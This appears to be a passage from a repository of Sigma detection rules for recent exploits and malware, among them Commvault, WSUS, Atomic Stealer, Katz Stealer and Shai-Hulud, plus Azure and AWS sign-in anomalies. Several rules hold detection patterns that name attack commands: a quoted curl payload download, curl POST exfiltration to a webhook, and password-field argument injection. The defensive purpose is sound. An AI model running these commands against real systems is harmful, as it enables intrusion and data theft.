    "content": "title: Commvault QLogin Argument Injection Authentication Bypass (CVE-2025-57791)\nid: ff0225a0-1d9a-4bae-ab26-6038b18bb6d4\nstatus: experimental\ndescription: |\n    Detects the use of argument injection in the Commvault qlogin command - potential exploitation for CVE-2025-57791.\n    An attacker can inject the `-localadmin` parameter via the password field to bypass authentication and gain a privileged token.\nreferences:\n    - https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/\nauthor: X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-20\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\n    - cve.2025-57791\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'qlogin'\n            - ' -cs '\n            - ' -localadmin'\n            - ' -clp '\n            - '_localadmin__'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-59287/proc_creation_win_exploit_cve_2025_59287.yml",
    "content": "title: Exploitation Activity of CVE-2025-59287 - WSUS Suspicious Child Process\nid: 43259cc4-1b80-4931-bd98-baea01afc196\nstatus: experimental\ndescription: |\n    Detects the creation of command-line interpreters (cmd.exe, powershell.exe) as child processes of Windows Server Update Services (WSUS) related process wsusservice.exe.\n    This behavior is a key indicator of exploitation for the critical remote code execution vulnerability such as CVE-2025-59287, where attackers spawn shells to conduct reconnaissance and further post-exploitation activities.\nreferences:\n    - https://unit42.paloaltonetworks.com/microsoft-cve-2025-59287/\n    - https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability\n    - https://hawktrace.com/blog/CVE-2025-59287-UNAUTH\nauthor: Huntress Labs, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-31\ntags:\n    - attack.execution\n    - attack.initial-access\n    - attack.t1190\n    - attack.t1203\n    - cve.2025-59287\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent_wsusservice:\n        ParentImage|endswith: '\\wsusservice.exe'\n    selection_parent_w3wp_wsuspool:\n        ParentImage|endswith: '\\w3wp.exe'\n        ParentCommandLine|contains: 'WsusPool'\n    selection_child:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\powershell_ise.exe'\n    condition: 1 of selection_parent_* and selection_child\nfalsepositives:\n    - If this activity is expected, consider filtering based on specific command lines, user context (e.g., `nt authority\\network service`), or parent process command lines to reduce noise.\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-59287/win_wsus_exploit_cve_2025_59287.yml",
    "content": "title: Exploitation Activity of CVE-2025-59287 - WSUS Deserialization\nid: e5f66e87-7d6b-404f-92fe-7aa67814b5cd\nstatus: experimental\ndescription: |\n    Detects cast exceptions in Windows Server Update Services (WSUS) application logs that highly indicate exploitation attempts of CVE-2025-59287, a deserialization vulnerability in WSUS.\nreferences:\n    - https://unit42.paloaltonetworks.com/cve-2025-59287/\n    - https://hawktrace.com/blog/CVE-2025-59287-UNAUTH\n    - https://github.com/0xBruno/WSUSploit.NET/tree/e239bce9d6b5f46a346e1e4c4d5e0a2a20d5c639\n    - https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-31\ntags:\n    - attack.execution\n    - attack.initial-access\n    - attack.t1190\n    - attack.t1203\n    - cve.2025-59287\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: application\ndetection:\n    selection:\n        Provider_Name: 'Windows Server Update Services'\n        EventID: 7053\n        Data|contains|all:\n           # Indicators of untrusted deserialization exploitation attempts\n           # https://github.com/pwntester/ysoserial.net/issues/114\n            - 'System.InvalidCastException'\n            - 'System.Windows.Data.ObjectDataProvider'\n            - 'Unable to cast object of type'\n            - 'System.Windows.Media.Brush'\n    condition: selection\nfalsepositives:\n    - Legitimate WSUS operations that may trigger similar error messages\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/file_event_macos_malware_amos_persistence.yml",
    "content": "title: Atomic MacOS Stealer - Persistence Indicators\nid: e710a880-1f18-4417-b6a0-b5afdf7e3023\nstatus: experimental\ndescription: |\n    Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.\nreferences:\n    - https://moonlock.com/amos-backdoor-persistent-access\n    - https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L44\nauthor: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)\ndate: 2025-11-22\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1564.001\n    - attack.t1543.004\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: macos\ndetection:\n    selection_user_helper:\n        # sh -c curl -o '/Users/<username>/.helper' hxxps://halesmp[.]com/zxc/app\n        Image|endswith: '/curl'\n        TargetFilename|startswith: '/Users/'\n        TargetFilename|endswith: '.helper'\n    selection_launchdaemon:\n        TargetFilename: '/Library/LaunchDaemons/com.finder.helper.plist'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/proc_creation_macos_malware_amos_curl_post.yml",
    "content": "title: Atomic MacOS Stealer - FileGrabber Activity\nid: e710a880-1f18-4417-b6a0-b5afdf7e33da\nrelated:\n    - id: e710a880-1f18-4417-b6a0-b5afdf7e305a\n      type: obsolete\nstatus: experimental\ndescription: |\n    Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity.\nreferences:\n    - https://www.trendmicro.com/en_us/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html\n    - https://hunt.io/blog/macos-clickfix-applescript-terminal-phishing\n    - https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L36\n    - https://www.jamf.com/blog/infostealers-pose-threat-to-macos/\nauthor: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)\ndate: 2025-11-22\ntags:\n    - attack.execution\n    - attack.t1059.002\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_curl_post:\n        CommandLine|contains|all:\n            - 'curl'\n            - 'POST'\n            - 'user:'\n            - '-H '\n            - 'BuildID'\n            - 'file=@/tmp/out.zip'\n            - 'cl: 0'\n    selection_filegrabber_exec:\n        CommandLine|contains|all:\n            - 'FileGrabber'\n            - '/tmp'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/Grixba/proc_creation_win_malware_grixba_recon.yml",
    "content": "title: Grixba Malware Reconnaissance Activity\nid: af688c76-4ce4-4309-bfdd-e896f01acf27\nstatus: experimental\ndescription: |\n    Detects execution of the Grixba reconnaissance tool based on suspicious command-line parameter combinations.\n    This tool is used by the Play ransomware group for network enumeration, data gathering, and event log clearing.\nreferences:\n    - https://fieldeffect.com/blog/grixba-play-ransomware-impersonates-sentinelone\n    - https://thedfirreport.com/2025/09/08/blurring-the-lines-intrusion-shows-connection-with-three-major-ransomware-gangs/\nauthor: yxinmiracle, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-26\ntags:\n    - attack.reconnaissance\n    - attack.t1595.001\n    - attack.discovery\n    - attack.t1046\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_mode_flag:\n        CommandLine|contains:\n            - '-m '\n            - '-mode '\n            - '-m:'\n            - '-mode:'\n    selection_input_flag:\n        CommandLine|contains:\n            - '-i '\n            - '-input '\n            - '-i:'\n            - '-input:'\n    selection_scan_value:\n        CommandLine|contains:\n            - 'scan '\n            - 'scanall '\n    selection_input_options:\n        CommandLine|contains:\n            - ':f '\n            - ':r '\n            - ':s '\n            - ' f '\n            - ' r '\n            - ' s '\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate tools that use similar command-line argument structures (e.g., a tool with '--mode scan' and '--input file.txt') could trigger this rule. However, the specific combinations are indicative of reconnaissance or defense evasion.\nlevel: high\nregression_tests_path: regression_data/rules-emerging-threats/2025/Malware/Grixba/proc_creation_win_malware_grixba_recon/info.yml\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/Katz-Stealer/dns_query_win_katz_stealer_domain.yml",
    "content": "title: DNS Query To Katz Stealer Domains\nid: 9c3d6e32-f4c8-4d73-8b8f-95c3b383a13c\nrelated:\n    - id: 6b0c762f-0e1b-435f-a829-5943b08fe36a\n      type: similar\nstatus: experimental\ndescription: |\n    Detects DNS queries to domains associated with Katz Stealer malware.\n    Katz Stealer is a malware variant that is known to be used for stealing sensitive information from compromised systems.\n    In Enterprise environments, DNS queries to these domains may indicate potential malicious activity or compromise.\nreferences:\n    - Internal Research\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-05-22\ntags:\n    - attack.command-and-control\n    - attack.t1071.004\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|contains:\n            - 'katz-panel.com'\n            - 'katz-stealer.com'\n            - 'katzstealer.com'\n            - 'twist2katz.com'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/Katz-Stealer/image_load_win_katz_stealer_payloads.yml",
    "content": "title: Katz Stealer DLL Loaded\nid: e6c7ab7c-c79d-4b84-b913-b2ec3f8e8a98\nstatus: experimental\ndescription: |\n    Detects loading of DLLs associated with Katz Stealer malware 2025 variants.\n    Katz Stealer is a malware variant that is known to be used for stealing sensitive information from compromised systems.\n    The process that loads these DLLs are very likely to be malicious.\nreferences:\n    - Internal Research\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-05-22\ntags:\n    - attack.execution\n    - attack.t1129\n    - detection.emerging-threats\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\katz_ontop.dll'\n            - '\\AppData\\Local\\Temp\\received_dll.dll'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/Katz-Stealer/net_dns_katz_stealer_domain.yml",
    "content": "title: DNS Query To Katz Stealer Domains - Network\nid: 6b0c762f-0e1b-435f-a829-5943b08fe36a\nrelated:\n    - id: 9c3d6e32-f4c8-4d73-8b8f-95c3b383a13c\n      type: similar\nstatus: experimental\ndescription: |\n    Detects DNS queries to domains associated with Katz Stealer malware.\n    Katz Stealer is a malware variant that is known to be used for stealing sensitive information from compromised systems.\n    In Enterprise environments, DNS queries to these domains may indicate potential malicious activity or compromise.\nreferences:\n    - Internal research\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-05-22\ntags:\n    - attack.command-and-control\n    - attack.t1071.004\n    - detection.emerging-threats\nlogsource:\n    category: dns\ndetection:\n    selection:\n        query|contains:\n            - 'katz-panel.com'\n            - 'katz-stealer.com'\n            - 'katzstealer.com'\n            - 'twist2katz.com'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/Katz-Stealer/zeek_http_katz_stealer_susp_useragent.yml",
    "content": "title: Katz Stealer Suspicious User-Agent\nid: 834c6d2f-5e98-4b2a-b453-0c4f234afedd\nstatus: experimental\ndescription: |\n    Detects network connections with a suspicious user-agent string containing \"katz-ontop\", which may indicate Katz Stealer activity.\nreferences:\n    - Internal Research\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-05-22\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - detection.emerging-threats\nlogsource:\n    product: zeek\n    service: http\ndetection:\n    selection:\n        user_agent|contains: 'katz-ontop'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/Shai-Hulud/file_event_lnx_mal_shai_hulud_workflow.yml",
    "content": "title: Shai-Hulud Malicious GitHub Workflow Creation\nid: 0aba5685-6db6-486f-88ef-29a99c545cfd\nstatus: experimental\ndescription: Detects creation of shai-hulud-workflow.yml file associated with Shai Hulud worm targeting NPM supply chain attack that exfiltrates GitHub secrets\nreferences:\n    - https://www.safetycli.com/blog/shai-hulud-npm-attack-runs-malicious-github-action\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-09-24\ntags:\n    - attack.persistence\n    - attack.credential-access\n    - attack.t1552.001\n    - attack.collection\n    - attack.t1119\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '.github/workflows/shai-hulud-workflow.yml'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/Shai-Hulud/github_mal_shai_hulud_npm_attack.yml",
    "content": "title: Shai-Hulud NPM Attack GitHub Activity\nid: 69fa9174-4370-4646-8d48-6a22e2853402\nstatus: experimental\ndescription: |\n    Detects GitHub activity associated with the 'Shai-Hulud' NPM supply chain attack. The attack involves malicious NPM packages that use stolen GitHub tokens to create a new branch,\n    inject a malicious workflow file to exfiltrate secrets, and make private repositories public.\nreferences:\n    - https://www.getsafety.com/blog-posts/shai-hulud-npm-attack\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-09-24\ntags:\n    - attack.persistence\n    - attack.impact\n    - detection.emerging-threats\nlogsource:\n    product: github\n    service: audit\ndetection:\n    selection:\n        - 'shai-hulud-workflow.yml'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/Shai-Hulud/proc_creation_lnx_mal_shai_hululd_exfiltration.yml",
    "content": "title: Shai-Hulud NPM Package Malicious Exfiltration via Curl\nid: efd2eb09-b72e-4a61-8dc7-b1382a1e8983\nstatus: experimental\ndescription: Detects potential Shai Hulud NPM package attack attempting to exfiltrate data via curl to external webhook sites.\nreferences:\n    - https://www.getsafety.com/blog-posts/shai-hulud-npm-attack\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-09-24\ntags:\n    - attack.exfiltration\n    - attack.t1041\n    - attack.collection\n    - attack.t1005\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/curl'\n        CommandLine|contains|all:\n            - 'curl'\n            - '-d'\n            - 'webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/file_event_win_malware_funklocker_ransomware_extension.yml",
    "content": "title: FunkLocker Ransomware File Creation\nid: 2c76a22b-702d-48fd-8fa9-e41e2fe203b3\nstatus: experimental\ndescription: Detects the creation of files with the \".funksec\" extension, which is appended to encrypted files by the FunkLocker ransomware.\nreferences:\n    - https://www.broadcom.com/support/security-center/protection-bulletin/funksec-ransomware\n    - https://www.pcrisk.com/removal-guides/31853-funklocker-funksec-ransomware\nauthor: Saiprashanth Pulisetti ( @Prashanthblogs)\ndate: 2025-08-08\ntags:\n    - attack.impact\n    - attack.t1486\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '.funksec'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/proc_creation_win_malware_kalambur_curl_socks_tor.yml",
    "content": "title: Kalambur Backdoor Curl TOR SOCKS Proxy Execution\nid: e99375eb-3ee0-407a-9f90-79569cc6a01c\nstatus: experimental\ndescription: Detects the execution of the \"curl.exe\" command, referencing \"SOCKS\" and \".onion\" domains, which could be indicative of Kalambur backdoor activity.\nreferences:\n    - https://blog.eclecticiq.com/sandworm-apt-targets-ukrainian-users-with-trojanized-microsoft-kms-activation-tools-in-cyber-espionage-campaigns\nauthor: Arda Buyukkaya (EclecticIQ)\ndate: 2025-02-11\ntags:\n    - attack.execution\n    - attack.command-and-control\n    - attack.t1090\n    - attack.t1573\n    - attack.t1071.001\n    - attack.t1059.001\n    - attack.s0183\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\curl.exe'\n    selection_socks:\n        CommandLine|contains:\n            - 'socks5h://'\n            - 'socks5://'\n            - 'socks4a://'\n    selection_onion:\n        CommandLine|contains: '.onion'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/README.md",
    "content": "# Emerging Threats Rules\n\nThis folder contains rules that belongs to the \"emerging-threats\" category of SIGMA. This category aims to cover specific threats that are timely and relevant for certain periods of time. These threats include specific APT campaigns, exploitation of Zero-Day vulnerabilities, specific malware used during an attack,...etc.\n\nThe folder structure is split by year and every folder can contain two sub-folders\n\n- `Exploits`: Contains specific rules that cover exploitation of vulnerabilities.\n- `Malware`: Contains specific rules that cover malware, ransomware and any type of suspicious software used by Threat Actors or malicious actors\n- `TA`: Contains specific rules that cover APT, Threat Actor and malware activities.\n"
  },
  {
    "path": "rules-placeholder/README.md",
    "content": "TBD"
  },
  {
    "path": "rules-placeholder/cloud/aws/cloudtrail/aws_cloudtrail_console_login_success_from_susp_locations.yml",
    "content": "title: AWS Console Login Monitoring\nid: 313e72de-0c0d-4d65-8c95-87f4d546eceb\nstatus: experimental\ndescription: |\n    Detects AWS console logins from countries and IP addresses that are not recognized as legitimate for the organization.\n    This alert can help identify potential unauthorized access attempts from unusual locations, which may indicate compromised credentials or malicious activity.\nreferences:\n    - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-aws-console-sign-in-events.html\nauthor: Ivan Saakov\ndate: 2025-10-19\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.persistence\n    - attack.t1078.004\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventName: 'ConsoleLogin'\n        responseElements.ConsoleLogin: 'Success'\n    filter_main_country:\n        src_country|expand: '%Legitimate_Countries%' # Add legitimate countries here\n    filter_main_ip:\n        src_ip|expand: '%Legitimate_IP_Ranges%' # Add legitimate src_ip ranges here\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate logins from trusted countries and IP addresses.\n    - Login through services hosted through cloud providers in other regions.\nlevel: medium\n"
  },
  {
    "path": "rules-placeholder/cloud/azure/audit_logs/azure_ad_account_created_deleted_nonapproved_user.yml",
    "content": "title: Account Created And Deleted By Non Approved Users\nid: c98184ba-4a27-4e10-b7b7-da48e71f4d25\nstatus: test\ndescription: Detects accounts that are created or deleted by non-approved users.\nreferences:\n    - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#short-lived-accounts\nauthor: Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1'\ndate: 2022-08-11\nmodified: 2023-12-15\ntags:\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1078\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message:\n            - Add user\n            - Delete user\n        Status: Sucess\n    valid_admin:\n        Initiatied.By|expand: '%ApprovedUserUpn%'\n    condition: selection and not valid_admin\nfalsepositives:\n    - Legit administrative action\nlevel: medium\n"
  },
  {
    "path": "rules-placeholder/cloud/azure/signin_logs/azure_ad_account_signin_outside_hours.yml",
    "content": "title: Authentication Occuring Outside Normal Business Hours\nid: 160f24f3-e6cc-496d-8a3d-f5d06e4ad526\nstatus: test\ndescription: Detects user signs ins outside of normal business hours.\nreferences:\n    - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1'\ndate: 2022-08-11\nmodified: 2023-12-15\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.privilege-escalation\n    - attack.t1078\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        Status: Sucess\n        # Countries you DO operate out of e,g GB, use list for mulitple\n        Location|expand: '%LegitCountries%'\n        # outside normal working hours\n        Date|expand: '%ClosingTime%'\n    condition: selection\nfalsepositives:\n    - User doing actual work outside of normal business hours.\nlevel: low\n"
  },
  {
    "path": "rules-placeholder/cloud/azure/signin_logs/azure_privileged_account_no_saw_paw.yml",
    "content": "title: Privilege Role Elevation Not Occuring on SAW or PAW\nid: 38a5e67b-436a-4e77-9f73-f48a82626890\nstatus: test\ndescription: Detects failed sign-in from a PAW or SAW device\nreferences:\n    - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor\nauthor: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'\ndate: 2022-08-11\nmodified: 2023-12-15\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.persistence\n    - attack.t1078\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    # You have to tune the rule for your environment before use it\n    selection:\n        properties.message|contains: Add memmber to role completed (PIM aciviation)\n        # Countries you DO operate out of e,g GB, use list for mulitple\n        Location|expand: '%LegitCountries%'\n        IPaddress|expand: '%UnApprovedIp%'\n        # unapproved browser, operating system\n        DeviceInfo|expand: '%UnApprovedDevice%'\n        DeviceDetail.isCompliant: 'false'\n        Status:\n            - Sucess\n            - failure\n    condition: selection\nfalsepositives:\n    - Not using a PAW/SAW in the environment\nlevel: high\n"
  },
  {
    "path": "rules-placeholder/cloud/azure/signin_logs/azure_privileged_account_sigin_expected_controls.yml",
    "content": "title: Privilege Role Sign-In Outside Expected Controls\nid: cf1e5687-84e1-41af-97a9-158094efef53\nstatus: test\ndescription: Detects failed sign-in due to user not meeting expected controls for adminitrators\nreferences:\n    - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor\nauthor: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'\ndate: 2022-08-11\nmodified: 2023-12-15\ntags:\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1078\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    # You have to tune the rule for your environment before use it\n    selection:\n        Status: failure\n        # Countries you do NOT operate out of e,g GB, use list for mulitple\n        Location|expand: '%UnLegitCountries%'\n        IPaddress|expand: '%UnApprovedIp%'\n        # unapproved browser, operating system\n        DeviceInfo|expand: '%UnApprovedDevice%'\n    condition: selection\nfalsepositives:\n    - A legit admin not following proper processes\nlevel: high\n"
  },
  {
    "path": "rules-placeholder/cloud/azure/signin_logs/azure_privileged_account_signin_outside_hours.yml",
    "content": "title: Privilege Role Sign-In Outside Of Normal Hours\nid: e927a2f5-e7af-424f-ace7-70ebb49e8976\nstatus: test\ndescription: Detects account sign ins outside of normal hours or uncommon locations. Administrator accounts should be investigated\nreferences:\n    - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor\nauthor: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'\ndate: 2022-08-11\nmodified: 2023-12-15\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.privilege-escalation\n    - attack.t1078\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    # You need to tune the rule for your enrivonnement before use\n    selection:\n        Status: Sucess\n        # Countries you DO operate out of e,g GB, use list for mulitple\n        Location|expand: '%LegitCountries%'\n        # outside normal working hours\n        Date|expand: '%ClosingTime%'\n        Initiatied.By|expand: '%ApprovedUserUpn%'\n    condition: selection\nfalsepositives:\n    - An admin doing actual work outside of normal business hours\nlevel: high\n"
  },
  {
    "path": "rules-placeholder/windows/builtin/security/win_security_admin_logon.yml",
    "content": "title: User with Privileges Logon\nid: 94309181-d345-4cbf-b5fe-061769bdf9cb\nstatus: test\ndescription: Detects logon with \"Special groups\" and \"Special Privileges\" can be thought of as Administrator groups or privileges.\nreferences:\n    - https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md\n    - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672\n    - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964\nauthor: frack113\ndate: 2022-10-14\nmodified: 2023-12-14\ntags:\n    - attack.defense-evasion\n    - attack.lateral-movement\n    - attack.credential-access\n    - attack.t1558\n    - attack.t1649\n    - attack.t1550\nlogsource:\n    service: security\n    product: windows\ndetection:\n    selection:\n        EventID:\n            - 4672\n            - 4964\n    filter_main_local_system:\n        SubjectUserSid: 'S-1-5-18'\n    filter_main_valid_account:\n        SubjectUserName|expand: '%Admins_Workstations%' # Set valid internal naming pattern or a list a valid account\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules-placeholder/windows/builtin/security/win_security_exploit_cve_2020_1472.yml",
    "content": "title: Potential Zerologon (CVE-2020-1472) Exploitation\nid: dd7876d8-0f09-11eb-adc1-0242ac120002\nstatus: test\ndescription: Detects potential Netlogon Elevation of Privilege Vulnerability aka Zerologon (CVE-2020-1472)\nreferences:\n    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472\n    - https://www.logpoint.com/en/blog/detecting-zerologon-vulnerability-in-logpoint/\nauthor: Aleksandr Akhremchik, @aleqs4ndr, ocsd.community\ndate: 2020-10-15\nmodified: 2023-12-15\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\n    - cve.2020-1472\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4742\n        SubjectUserName: 'ANONYMOUS LOGON'\n        TargetUserName|expand: '%DC-MACHINE-NAME%' # DC machine account name that ends with '$'\n    filter_main:\n        PasswordLastSet: '-'\n    condition: selection and not filter_main\nfalsepositives:\n    - Automatic DC computer account password change\n    - Legitimate DC computer account password change\nlevel: high\n"
  },
  {
    "path": "rules-placeholder/windows/builtin/security/win_security_potential_pass_the_hash.yml",
    "content": "title: Potential Pass the Hash Activity\nid: f8d98d6c-7a07-4d74-b064-dd4a3c244528\nstatus: test\ndescription: Detects the attack technique pass the hash which is used to move laterally inside the network\nreferences:\n    - https://github.com/nsacyber/Event-Forwarding-Guidance/tree/6e92d622fa33da911f79e7633da4263d632f9624/Events\nauthor: Ilias el Matani (rule), The Information Assurance Directorate at the NSA (method)\ndate: 2017-03-08\nmodified: 2023-12-15\ntags:\n    - attack.lateral-movement\n    - attack.defense-evasion\n    - attack.t1550.002\n    - car.2016-04-004\nlogsource:\n    product: windows\n    service: security\n    definition: The successful use of PtH for lateral movement between workstations would trigger event ID 4624, a failed logon attempt would trigger an event ID 4625\ndetection:\n    selection:\n        EventID:\n            - 4624\n            - 4625\n        LogonType: 3\n        LogonProcessName: 'NtLmSsp'\n        WorkstationName|expand: '%Workstations%'\n        ComputerName|expand: '%Workstations%'\n    filter:\n        TargetUserName: 'ANONYMOUS LOGON'\n    condition: selection and not filter\nfalsepositives:\n    - Administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules-placeholder/windows/builtin/security/win_security_remote_registry_management_via_reg.yml",
    "content": "title: Remote Registry Management Using Reg Utility\nid: 68fcba0d-73a5-475e-a915-e8b4c576827e\nstatus: test\ndescription: Remote registry management using REG utility from non-admin workstation\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: Teymur Kheirkhabarov, oscd.community\ndate: 2019-10-22\nmodified: 2023-12-15\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.discovery\n    - attack.s0075\n    - attack.t1012\n    - attack.t1112\n    - attack.t1552.002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5145\n        RelativeTargetName|contains: '\\winreg'\n    filter_main:\n        IpAddress|expand: '%Admins_Workstations%'\n    condition: selection and not filter_main\nfalsepositives:\n    - Legitimate usage of remote registry management by administrator\nlevel: medium\n"
  },
  {
    "path": "rules-placeholder/windows/builtin/security/win_security_susp_interactive_logons.yml",
